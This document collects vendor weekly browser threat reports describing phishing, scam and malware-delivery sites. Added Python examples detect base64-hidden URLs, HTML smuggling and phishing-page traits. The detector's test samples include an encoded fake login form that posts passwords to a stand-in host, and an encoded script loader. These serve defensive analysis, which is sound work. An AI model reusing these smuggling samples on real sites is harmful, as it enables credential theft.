Conceal’s Weekly Threat Reports are highlights of recently detected sites that were deemed suspicious using our AI-powered browser extension, ConcealBrowse.

ConcealBrowse is leveraged by teams across the world to combat weaponized URLs. The technology is constantly analyzing suspicious web artifacts to identify risks in the form of drive-by attacks, phishing portals, and other threats that materialize while browsing.

Browser-Based Threat Report: Nov. 20

Week of November 20th, 2023

At Conceal, your digital safety is our utmost priority. Our weekly threat report for the week of November 20th, 2023, unveils critical insights into the ever-evolving landscape of online threats.

The following report highlights recently detected sites that were deemed suspicious:

_____________

SHA-256: fb9182a611e6c357d3d7876f898ce7246ad777e69367d983042a04bb93d8bd29

This URL was detected by ConcealBrowse on November 14th, 2023. It was first identified by various CTI feeds on November 15th, 2023. This showcases the importance of real-time analysis which is enabled by ConcealBrowse. To date, only 3 other security vendors have identified this URL.

Vendors flagged the page because it is poorly constructed. The site lacks many elements common to legitimate sites, such as author and copyright meta tags and a favicon, and it includes a high number of embedded images. In addition to third-party vendor suspicion, ConcealBrowse intervened due to the abundance of null and void links found on the page. Poorly crafted and maintained websites are often targeted and used to propagate spam and malware.

_____________

SHA-256: 2c3f85699de22827b33ef601739924844e913db62198ef8acfd64c66c5c434a3

This URL was detected by ConcealBrowse on November 15th, 2023. The URL was first identified by 3 security vendors on October 13th, 2023. Today, 5 vendors have categorized it as suspicious, phishing, and even malware.

The delivered page asks users to enable notifications. Once enabled, multiple notifications appear on the screen (see below) that inform users that their computer is infected. Mimicking a trusted security vendor, the adversary convinces users to engage with the popups, which then initiates an HTML file download. This file carries out the following MITRE ATT&CK techniques: Persistence and Privilege Escalation through registry run key creation, Defense Evasion via masquerading, Discovery via Simple Service Discovery Protocol broadcast queries, and Command and Control through an encrypted HTTPS channel.

_____________

SHA-256: 31cf2c5502691f5f875cb1f65f3e19458009ecacfaabd007e07d5475348ad042

This web page was detected by ConcealBrowse on November 16th, 2023 and was first identified as malicious on October 10, 2022. As of November 16th, the URL has been annotated as malicious, malware, and suspicious by 4 security vendors in total. This shows the dynamic reputation of webpages, thus emphasizing the importance of real-time URL analysis, which is enabled with ConcealBrowse.

Further analysis of this website shows that several files are flagged as malicious, including two JavaScript files and a .ico file. These JavaScript files match a YARA rule that detects the presence of a Base64_Encoded_URL, which is a common theme among recent examples where ConcealBrowse has intervened to protect the endpoint.
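How a Base64-encoded URL can be surfaced in a script during triage, shown as an added example (it is not ConcealBrowse's detection logic or the YARA rule referenced above). The sample script, hostnames and function names are constructed for illustration.

```python
import base64
import binascii
import re

# Runs of 16+ characters from the standard or URL-safe base64 alphabet.
B64_RUN = re.compile(r"[A-Za-z0-9+/_-]{16,}={0,2}")
# A URL inside the decoded bytes, at any offset (for example wrapped in JSON).
URL_IN_BYTES = re.compile(rb"https?://[^\s\"'<>\\}]+")


def decode_run(run):
    """Return the decoded bytes of a candidate run, or None if it is not base64."""
    s = run.rstrip("=").replace("-", "+").replace("_", "/")
    if len(s) % 4 == 1:  # impossible length for base64
        return None
    try:
        return base64.b64decode(s + "=" * (-len(s) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None


def defang(url):
    """Rewrite a URL so it cannot be clicked or auto-linked in a report."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + sep + path


def find_encoded_urls(text):
    """List URLs hidden inside base64 string runs of a script or HTML source."""
    findings = []
    for match in B64_RUN.finditer(text):
        raw = decode_run(match.group(0))
        if raw is None:
            continue
        for hit in URL_IN_BYTES.finditer(raw):
            url = hit.group(0).decode("ascii", "replace")
            findings.append({"offset": match.start(), "url": url, "defanged": defang(url)})
    return findings


def enc(data):
    return base64.b64encode(data).decode()


# Constructed sample: one benign long identifier, one directly encoded URL,
# and one URL buried inside an encoded JSON object.
SAMPLE_JS = "\n".join([
    'var handler = "getElementsByClassNameFallbackHandler";',
    'var s = document.createElement("script");',
    's.src = atob("%s");' % enc(b"https://cdn.example.test/loader.js"),
    'var cfg = JSON.parse(atob("%s"));' % enc(b'{"u":"http://files.example.test/a.html"}'),
])

if __name__ == "__main__":
    for finding in find_encoded_urls(SAMPLE_JS):
        print(finding["offset"], finding["defanged"])
```

Decoding whole runs misses URLs whose encoded form is split across concatenated string literals; those need the script to be normalized first.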

It is important to note that the site appears to have been taken down.

_____________

Valuable Outcomes

ConcealBrowse offers comprehensive protection against many sophisticated cyber threats, as recent threat reports exemplify. Our advanced threat detection capabilities have successfully flagged and quarantined malicious web pages, preventing users from falling victim to various cyber-attacks. Conceal remains dedicated to upholding the integrity of online interactions, constantly refining our detection algorithms and threat identification protocols to ensure proactive protection against emerging cyber threats. By integrating cutting-edge technology and a robust security infrastructure, we empower users to navigate the digital landscape with confidence, knowing that their online activities are shielded from potential harm.

Join the Conceal Community and claim your FREE ConcealBrowse licenses!

Join the Conceal Community today and fortify your online security for free! Don’t miss the chance to benefit from our advanced threat protection and stay one step ahead of cybercriminals. Experience peace of mind while browsing the internet, knowing that ConcealBrowse is your shield against the ever-evolving threat landscape. Take the proactive step towards a safer online experience – get your free ConcealBrowse license now and join a community committed to safeguarding your digital world.

Sign up for the Conceal Community and claim your free licenses by completing the form below.


Browser-Based Threat Report: Nov. 13

Week of November 13th, 2023

At Conceal, your digital safety is our utmost priority. Our weekly threat report for the week of November 13th, 2023, unveils critical insights into the ever-evolving landscape of online threats.

The following report highlights recently detected sites that were deemed suspicious:

_____________

SHA-256: 02f7c0e429b7388692f75d54bfde7e6bc2f1f68160efa434e306bd7d352f41c0

This URL was detected by ConcealBrowse on November 8th, 2023. It was first identified by various CTI feeds on October 5th, 2023, and resubmitted on November 9th, 2023, highlighting the continued nefarious activity of the domain. To date, 16 security vendors have annotated the URL as malicious.

This page takes advantage of typosquatting, in which end users accidentally type in the wrong web address, which then leads them to a page that mimics their intended destination. This specific instance mimics a popular shopping page and seems harmless. The intent of the majority of these spoofed sites is to obtain sensitive information from the end user, such as credit card information and address, during the checkout process.

_____________

SHA-256: f84a8fa0bc3dd592124b7a14a1bb64cb4fe8b40626c58d5c0341a3d590975500

This URL was detected by ConcealBrowse on November 6th, 2023. The URL was first detected by 2 security vendors on November 4th and by 18 security vendors to date. The URL has been classified as malicious and subsequently as a delivery vector for malware and spam.

The top-level domain used by the page is notorious for hosting malicious and risky web pages. Further, research indicates that nearly half of the registered domains using “.top” are used for nefarious activity such as spam and malware distribution. This specific URL directed users to a page that hosted various malware from Arkei, PrivateLoader, and Vidar. Their purpose is to steal information from the endpoints they infect, including saved passwords, credit card information, and, most recently, 2-factor authentication tokens.

_____________

SHA-256: 82cf0044f474bbef6e896f0e741f0795fe6c2abcc7facec854e5967a17b89ea5

This web page was detected by ConcealBrowse on November 9th, 2023, and was first identified as malicious on September 28th, 2022. As of November 14th, the URL has been annotated as malicious, malware, and suspicious by 6 security vendors in total. This shows the dynamic reputation of webpages, thus emphasizing the importance of real-time URL analysis, which is enabled with ConcealBrowse.

The web page is hosted by a web server that has historically hosted other malicious sites. In addition, the URL has recently been seen downloading two files of unknown content and has several embedded JavaScript files. After further static and dynamic analysis, the embedded JS files appear to modify the DOM of the parent URL. Due to this behavior, the URL has been identified by security vendors and has even been sinkholed by various DNS providers.

_____________


Browser-Based Threat Report: Nov. 6

Week of November 6th, 2023

At Conceal, your digital safety is our utmost priority. Our weekly threat report for the week of November 6th, 2023, unveils critical insights into the ever-evolving landscape of online threats.

The following report highlights recently detected sites that were deemed suspicious:

_____________

SHA-256: e487be0271aa1047e6dd76c59aa6b04094c99113188f9fa139c39497097228c7

This URL was detected by ConcealBrowse on November 3rd, 2023, and was first submitted to various CTI feeds on November 4th, showcasing how ConcealBrowse protects users from the unknown.

When visiting the page, users encounter various pop-ups that state the workstation is infected with malware. This common tech support scam then prompts the end user to call the number listed in the pop-up to remedy the infection. Often, the scammers attempt to elicit payment from users, or entice them to download some sort of remote access software from the page, thus granting access to the endpoint. The Remote Access Trojan, if downloaded, grants persistent access with registry keys, gains elevated privileges and even bypasses file scanning and monitoring tools using various masquerading tactics.

_____________

SHA-256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

This web page was detected by ConcealBrowse on November 3rd, 2023, and was first identified by CTI feeds the same day. To date, only 4 security vendors have identified this threat. This highlights the ability of ConcealBrowse to identify current adversary techniques and delivery methods.

The original URL in question has various redirects that lead the end user to a spoofed McAfee home page. The final page, seen below, is very interactive, meaning the spoofed page has been well crafted to increase its legitimacy. The spoofed page, which is hosted across numerous Russian-based web servers, was dynamically creating help and feedback buttons, hoping users would engage. It was discovered that the domain was seen delivering backdoors via this technique in previous campaigns.

_____________

SHA-256: cba292db6c58d7028353ca98ee27dc334640987670b15cb83f2b419686596996

This currently active URL was detected by ConcealBrowse on November 2nd, 2023, with variations of the malicious pathname (intentionally removed above) identified throughout the first week of November 2023. The URL blocked by ConcealBrowse has since been identified by 10 security vendors, who have classified the delivered webpage as malicious, suspicious, phishing, and even malware. The domain has been identified as a known infection source by reputable CTI feeds, indicating that nefarious content is continuously delivered.

The webpage is a blog that has various referrer headers that request resources from legitimate domains such as Google and YouTube. The page, however, does request resources from a known malicious domain that was seen downloading suspicious HTML files just a week ago. Since the page is requesting resources from a known malicious domain, the page should be avoided.

_____________


Browser-Based Threat Report: Oct. 30

Week of October 30th, 2023

At Conceal, your digital safety is our utmost priority. Our weekly threat report for the week of October 30th, 2023, unveils critical insights into the ever-evolving landscape of online threats.

The following report highlights recently detected sites that were deemed suspicious:

_____________

SHA-256: 95bd5672de917dd113b5a48f4347931661dced296f6b83d2e76c002f3847e926

This URL was detected by ConcealBrowse on October 27th, 2023. It was first submitted to various CTI feeds on October 13th and most recently on October 25th, 2023.

The page was last seen delivering an innocent-seeming HTML file that contains encoded JavaScript. As it opens in the browser, the file dynamically reconstructs new HTML code and presents the end user with a spoofed Microsoft login page, as seen above. Fortunately, ConcealBrowse identified anomalies associated with the page and prevented the HTML smuggling attack from occurring in the first place, subsequently stopping the credential theft attempt.

This attack type is becoming increasingly popular due to its stealthiness. The HTML file delivered by drive-by download not only comes from a reputable source (in this case, Cloudflare’s development platform) but is also encoded, then decoded and reconstructed locally to bypass web proxies and email gateways.
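Static indicators an analyst can look for in a delivered HTML file of this kind, shown as an added example (not ConcealBrowse's logic). It generalizes slightly beyond the case above by also recognizing other decode primitives and DOM sinks; the sample pages, verdict labels and length threshold are constructed assumptions.

```python
import base64
import binascii
import re
from html.parser import HTMLParser

# Decode primitives and DOM sinks commonly combined to rebuild a page locally.
DECODERS = re.compile(r"\b(atob|unescape|decodeURIComponent|String\.fromCharCode)\s*\(")
SINKS = re.compile(r"document\.write(?:ln)?\s*\(|\.innerHTML\s*=|\.srcdoc\s*=|createObjectURL\s*\(")
# Quoted base64 literal; the 120-character floor is an assumed threshold.
LONG_LITERAL = re.compile(r"""["'`]([A-Za-z0-9+/=]{120,})["'`]""")
PASSWORD_INPUT = re.compile(rb"""<input[^>]+type\s*=\s*["']?password""", re.I)


class ScriptExtractor(HTMLParser):
    """Collect inline script bodies and note password fields in static markup."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.scripts = []
        self.static_password = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.scripts.append("")
        elif tag == "input" and dict(attrs).get("type", "").lower() == "password":
            self.static_password = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data


def decode_layer(literal):
    try:
        return base64.b64decode(literal, validate=True)
    except (binascii.Error, ValueError):
        return None


def analyze(html_text):
    """Return the indicators found and a verdict for one HTML document."""
    parser = ScriptExtractor()
    parser.feed(html_text)
    parser.close()
    js = "\n".join(parser.scripts)
    indicators = []
    if DECODERS.search(js):
        indicators.append("decode-primitive")
    if SINKS.search(js):
        indicators.append("dom-rewrite-sink")
    literals = LONG_LITERAL.findall(js)
    if literals:
        indicators.append("long-encoded-literal")
    # A login form that exists only after decoding is the strongest signal.
    hidden_form = any(
        (layer := decode_layer(lit)) is not None and PASSWORD_INPUT.search(layer)
        for lit in literals
    )
    if hidden_form and not parser.static_password:
        indicators.append("hidden-credential-form")
    if "hidden-credential-form" in indicators:
        verdict = "likely-smuggled-credential-page"
    elif len(indicators) == 3:
        verdict = "possible-html-smuggling"
    else:
        verdict = "no-smuggling-indicators"
    return {"indicators": indicators, "verdict": verdict}


# Constructed samples: a minimal encoded form wrapped in a decoder, and a
# plain login page whose form is visible in the static markup.
INNER = (b'<form method="post" action="https://collector.example.test/">'
         b'<input type="email" name="u"><input type="password" name="p">'
         b'<button>Sign in</button></form>')
SMUGGLED = ('<html><head><title>Invoice</title></head><body><script>'
            'var d = "%s"; document.write(atob(d));'
            '</script></body></html>' % base64.b64encode(INNER).decode())
PLAIN_LOGIN = ('<html><body><form><input type="password" name="p"></form>'
               '<script>document.title = "Login";</script></body></html>')

if __name__ == "__main__":
    print(analyze(SMUGGLED))
    print(analyze(PLAIN_LOGIN))
```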

_____________

SHA-256: fc93937220e51c05c4c2273fe7ae0d8f50b0faafb1c1f02659bb3c0652f5b421

This web page was detected by ConcealBrowse on October 30th, 2023 with it first being submitted to CTI feeds on October 31st, 2023. This showcases Conceal’s ability to identify risky webpages in real time, even before CTI feeds report on them. This type of attack has been seen in several of Conceal’s customer environments.

The delivered page mimics the Yahoo home page by pulling legitimate assets such as images, an iFrame and even a script from Yahoo.com, which is not common practice. Any assets pulled from legitimate sites are mainly served through their content delivery network. The adversaries spent a decent amount of time crafting the page, which included 168 legitimate links leading to Yahoo. However, the page did have a high number of empty and void links, which is indicative of phishing sites. Threat actors often do not have the time or ability to fully mimic web page functionality. As a result, the site has subsequently been identified by 5 security vendors as a phishing site.
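The void-link signal described here, together with the missing meta tags and favicon noted in the Nov. 20 report, can be measured directly from page markup. This is an added example, not ConcealBrowse's implementation; the thresholds, flag names, hostnames and sample pages are constructed assumptions.

```python
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urlsplit

# href values that lead nowhere; a missing href is recorded as "".
VOID_HREFS = {"", "#", "#!", "javascript:;", "javascript:void(0)", "javascript:void(0);"}


class PageProfile(HTMLParser):
    """Collect anchors, meta names, favicon presence and image count."""

    def __init__(self):
        super().__init__()
        self.links = []
        self.meta_names = set()
        self.has_favicon = False
        self.images = 0

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "a":
            self.links.append(a.get("href", "").strip())
        elif tag == "meta" and a.get("name"):
            self.meta_names.add(a["name"].lower())
        elif tag == "link" and "icon" in a.get("rel", "").lower().split():
            self.has_favicon = True
        elif tag == "img":
            self.images += 1


def link_host(href):
    try:
        return urlsplit(href).hostname
    except ValueError:  # malformed URL such as an unclosed IPv6 bracket
        return None


def profile(html_text, page_host, void_threshold=0.3, foreign_share=0.8):
    """Score one page; both thresholds are illustrative, not vendor values."""
    p = PageProfile()
    p.feed(html_text)
    p.close()
    void = [h for h in p.links if h.lower().replace(" ", "") in VOID_HREFS]
    foreign = Counter(
        host for host in map(link_host, p.links) if host and host != page_host
    )
    total = len(p.links)
    working = total - len(void)
    void_ratio = len(void) / total if total else 0.0
    top_host, top_count = foreign.most_common(1)[0] if foreign else (None, 0)
    flags = []
    if void_ratio >= void_threshold:
        flags.append("high-void-link-ratio")
    if not {"author", "copyright"} & p.meta_names:
        flags.append("no-author-or-copyright-meta")
    if not p.has_favicon:
        flags.append("no-favicon")
    # Nearly every working link pointing at one other site suggests a copy of it.
    if top_count and top_count >= foreign_share * working:
        flags.append("links-dominated-by-foreign-host")
    return {"links": total, "void_ratio": void_ratio, "images": p.images,
            "top_foreign_host": top_host, "flags": flags}


# Constructed samples: a lookalike page hosted away from the site it copies,
# and an ordinary page with metadata and mostly working links.
LOOKALIKE = (
    "<html><head><title>Sign in</title></head><body>"
    + "".join('<a href="https://www.brand.example/p%d">x</a>' % i for i in range(6))
    + '<a href="#">Help</a><a href="">Terms</a>'
    + '<a href="javascript:void(0)">Privacy</a><a>Contact</a>'
    + '<img src="https://www.brand.example/logo.png"></body></html>'
)
ORDINARY = (
    '<html><head><meta name="author" content="Site Team">'
    '<link rel="shortcut icon" href="/favicon.ico"></head><body>'
    '<a href="/about">About</a><a href="/news">News</a>'
    '<a href="https://shop.example.org/cart">Cart</a>'
    '<a href="https://cdn.partner.example/docs">Docs</a><a href="#">Top</a>'
    "</body></html>"
)

if __name__ == "__main__":
    print(profile(LOOKALIKE, "login.portal.example.test"))
    print(profile(ORDINARY, "shop.example.org"))
```

None of these flags is conclusive on its own; they are weak signals meant to be combined with reputation and behavioural data.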

_____________

SHA-256: da9bb3966753582f1ad63eb91315ce3207b33bec9b166adc7048ddcc70258a40

This currently active URL was detected by ConcealBrowse on October 25th, 2023. Although the webpage was first submitted to various CTI feeds on October 31st, 2021, it was resubmitted the morning of October 31st, 2023, meaning the page continues to deliver suspicious content.

The webpage is a login page to a commoditized Phishing-as-a-Service (PhaaS) provider based out of Russia that has been operating since June 2021. As a purchasable nefarious phishing service, the page should not be trusted.

_____________


Browser-Based Threat Report: Oct. 23

Week of October 23rd, 2023

At Conceal, your digital safety is our utmost priority. Our weekly threat report for the week of October 23rd, 2023, unveils critical insights into the ever-evolving landscape of online threats.

The following report highlights recently detected sites that were deemed suspicious:

ConcealBrowse was able to identify one of these threats seven days before the other threat feeds.

_____________

SHA-256: 0b52c5338af355699530a47683420e48c7344e779d3e815ff9943cbfdc153cf2

This URL was detected by ConcealBrowse on October 17th, 2023, and was first submitted to a handful of CTI feeds on October 15th, 2023. The webpage has since been taken down. This 17-day lapse between domain registration and page deletion is a long time given today’s threat environment. This highlights the importance of real-time analysis, which ConcealBrowse enables. In this gap, only 8 security vendors, including ConcealBrowse, flagged the page as suspicious.

The webpage the URL led its victims to was seen downloading an HTML file that has a historically bad reputation for various actions such as C2 node callouts.

The serving IP address continues to host malicious domains and has been flagged as malicious by two security vendors. Other webpages hosted on the server have been featured in Conceal’s weekly threat report previously.

_____________

SHA-256: d772f4ce3ff3a63d73da19acb3864fa4b3cf01807ac6c9322db27d60e2f4e7fa

This web page was detected by ConcealBrowse on October 12th, 2023, with it first being submitted to CTI feeds on October 19th, 2023. This showcases Conceal’s ability to identify risky webpages in real-time, even before CTI feeds report on them.

The delivered webpage included a captcha, prompting the end user to click on the “allow” button in the fake notification displayed in the top left (see below). This is a common tactic in which attackers present iFrames or transparent overlays on top of seemingly innocuous and common interactive dialogue boxes. Users click the transparent iFrame because such dialogue boxes are common. However, the overlay executes a script that often initiates a download or even displays a login screen to capture credentials. This specific webpage is no longer active; however, users should be cautious when they see this tactic in the wild.

_____________

SHA-256: 6f5d8c5bf77786b84d00504f8a8f790a2261f49aef0c11327b611b9e1e91ab6e

This currently active URL was detected by ConcealBrowse on October 23rd, 2023. Although the webpage was first submitted to various CTI feeds on July 17th, 2018, it was resubmitted the morning of October 24th, meaning the page continues to deliver suspicious content.

The webpage has recently been delivering an HTML file that has conducted HTTP requests to various .ru domains. The serving IP address has been annotated in the past as a malicious C2 node and, more recently, has been identified as a cryptomining server by other intelligence services.

_____________


Browser-Based Threat Report: Oct. 16

Week of October 16th, 2023

At Conceal, your digital safety is our utmost priority. Our weekly threat report for the week of October 16th, 2023, unveils critical insights into the ever-evolving landscape of online threats.

The following report highlights recently detected sites that were deemed suspicious:

_____________

SHA-256: 42a439f1d2c94a9d456fc25fd9ae758fd1a55b1061d4a9ba5e90406424f3f39c

This URL was detected by ConcealBrowse on October 16th, 2023, and was first submitted to a handful of CTI feeds on September 21st, 2023. The URL in question was recently submitted for new analysis on October 15th, 2023. To date, only 4 security vendors excluding ConcealBrowse have annotated this URL.

The link uses various HTTP (insecure) redirects, which lead to gambling sites, spoofed shopping sites, and a suspicious download. More concerning, it also redirects to a QR code, which entices end users to scan it with their mobile devices, which are often less secure than our PCs and laptops. The QR code leads the user to another suspicious webpage that is being tracked by CTI feeds.

Additionally, the serving IP address annotated above has been seen delivering a W32 trojan variant as recently as October 8th, 2023.

_____________

SHA-256: 18358a77382e2475a5dcc8445ef23a859d1d7cb698d6b31808f76104cf30fbfd

This web page was detected by ConcealBrowse on October 16th, 2023, and was first submitted to CTI feeds on August 3rd, 2019. This site reflects a continuing trend in which compromised websites of smaller businesses go unaddressed for long periods.

When this site was analyzed, it was flagged as malicious by multiple vendors. Further analysis shows that the site triggers several signatures, including the creation of files in the system directory.

Several MITRE ATT&CK techniques were also observed on this site at the time of analysis, including: Masquerading, Process Injection, Ingress Tool Transfer, Encrypted Channel, Application Layer Protocol, and Non-Application Layer Protocol.

_____________

SHA-256: 18358a77382e2475a5dcc8445ef23a859d1d7cb698d6b31808f76104cf30fbfd

This currently active URL was detected by ConcealBrowse on October 16th, 2023. Although it was first submitted to various CTI feeds on August 15th, 2023, it was resubmitted the morning of October 17th, meaning the delivered page has been compromised again.

The URL takes users to a seemingly benign page offering a free PDF converter. When clicking “Download Now,” users download the converter and, inadvertently, a malicious dropper file. The dropper file is a RedLine trojan variant.

_____________


Browser-Based Threat Report: Oct. 2

Week of October 2nd, 2023

In today’s digital landscape, threats to online security are ever-evolving, and staying one step ahead of malicious actors is essential. ConcealBrowse is your trusted partner in the battle against cyber threats. Our advanced threat detection and prevention system uncovered a severe security risk on September 20th, 2023, and we have been at the forefront of safeguarding online experience ever since.

The following report highlights recently detected sites that were deemed suspicious:

This web page was detected by ConcealBrowse on September 20th, 2023, with it first being submitted to various CTI feeds on March 20th, 2023. The page was recently submitted for analysis on September 21st, 2023, indicating that the page is continuously compromised to serve malicious content.

The compromised site was conducting drive-by downloads via embedded JavaScript files, delivering an HTML file with a SHA-256 of 0d3e98ca727fc1201b436170af5a63f23348aaf146a3ac6234f6c4da283e8b34.

By using various MITRE ATT&CK techniques to evade detection via process injection and to conduct command and control via ingress tool transfer, the adversary can deliver the suspected credential-harvesting HTML file and export the user-supplied credentials.

_____________

This web page was detected by ConcealBrowse on September 29th, 2023, and was first submitted to CTI feeds on December 29th, 2015. The page was most recently submitted on September 23rd, 2023 due to its continued nefarious activities. The page contains a redirect to hxxp://survey-smiles[.]com that is delivering an HTML file with the SHA-256 of 10dbbd006c5099d6e4f1302ffb0bd95885c0b4caf4107de725b73c08bdb8a39d.

Upon further analysis of the original URL, it was identified to be a referred URL inside the strings of the njRAT-master trojan (SHA-256: c6c2f7f109ce90b2874266c2dfea905bdca745dfac3922d674922de476109d30).

Finally, the hosting IP address has been reportedly communicating with various Win32 EXE files that are redirecting victims to a spoofed PayPal page, reinstalling adware, and delivering trojans amongst other malicious activities. Other URLs hosted on the same IP address are currently delivering malicious payloads and are actively phishing.

_____________

This currently active page was detected by ConcealBrowse on September 28th, 2023, and was first submitted to various CTI feeds later that same day. When the page is loaded, it leads victims to a spoofed Microsoft login page that entices users to divulge their credentials. Fortunately, ConcealBrowse detected the page and not only sent it to isolation, but also prevented the user from entering their password, as seen below.

_____________
